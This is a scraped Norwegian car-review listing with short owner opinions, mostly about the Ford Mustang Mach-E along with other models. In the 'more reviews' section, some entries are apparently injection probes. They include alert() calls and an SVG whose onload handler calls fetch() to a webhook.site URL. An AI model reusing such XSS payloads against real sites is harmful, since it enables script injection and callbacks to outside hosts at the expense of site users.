Vurdert av Oggi
Flere vurderinger fra samme generasjon
Ford Mustang Mach-E (2024)
Flott bil.
Ford Mustang Mach-E (2024)
Tipp topp bil.
Ford Mustang Mach-E (2023)
Super bil. Rart ikke flere kjøper denne modellen
Ford Mustang Mach-E (2023)
Dette er totalt sett den beste bilen jeg noensinne har eid.
Ford Mustang Mach-E (2023)
En fryd å kjøre. Går godt. Ikke hatt noen problemer. Trygg og god på glatten, med god fremkommelighet. God kvalitetsfølelse på interiør og eksteriør.
Ford Mustang Mach-E (2023)
I forhold til det man forventer av en bil i denne prisklassen synes jeg får for lite igjen for kjøpet og det er ingen god følelse. Kanskje derfor det ikke går så mange GT’er på norske veier.
Ford Mustang Mach-E (2023)
10/10 oppfyller alle mine behov. Første bilen jeg har hatt uten feil og driftsproblemer første året i mitt eie, i tillegg til at årlig kjørelengde er tripplet pga. jobb bytte. Kunne ikke vært
Ford Mustang Mach-E (2022)
Liker utseende, lavt støynivå og gode kjøreegenskaper. Veldig bra firehjulstrekk.
Ford Mustang Mach-E (2022)
Absolutt å anbefale. God på vinterføre. Innertier bokstavelig talt.
Ford Mustang Mach-E (2022)
Er noen ting som jeg ikke liker på bilen, det er en irriterende pipelyd i drivverket ved spesielle hastigheter, setene er for flate med liten støtte, kald kupe om vinteren, mangel på varmepumpe.
Ford Mustang Mach-E (2022)
Kjempefornøyd!
Ford Mustang Mach-E (2022)
Beste bilen jeg har eid med god margin. Fantastisk å kjøre, helt problemfri og ser bra ut i tillegg.
Ford Mustang Mach-E (2022)
2023 Premium Tekno+ Panorama AWD. Kan begynne med det som kunne vært bedre: litt korte seter og litt lite sidestøtte i setene. ( vanesak ) Har kjørt bil med bedre adaptiv cruise control, men igru
Ford Mustang Mach-E (2022)
Fin bil rett og slett - av de aller peneste elbiler tilgjengelig, god kvalitetsfølelse. OTA programvareoppgradering kommer i rykk og napp, men forbedrer bilen stadig. Tradisjonell betjening av bilen
Ford Mustang Mach-E (2022)
Fin bil rett og slett - av de aller peneste elbiler tilgjengelig, god kvalitetsfølelse. OTA programvareoppgradering kommer i rykk og napp, men forbedrer bilen stadig. Tradisjonell betjening av bile
Flere vurderinger
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.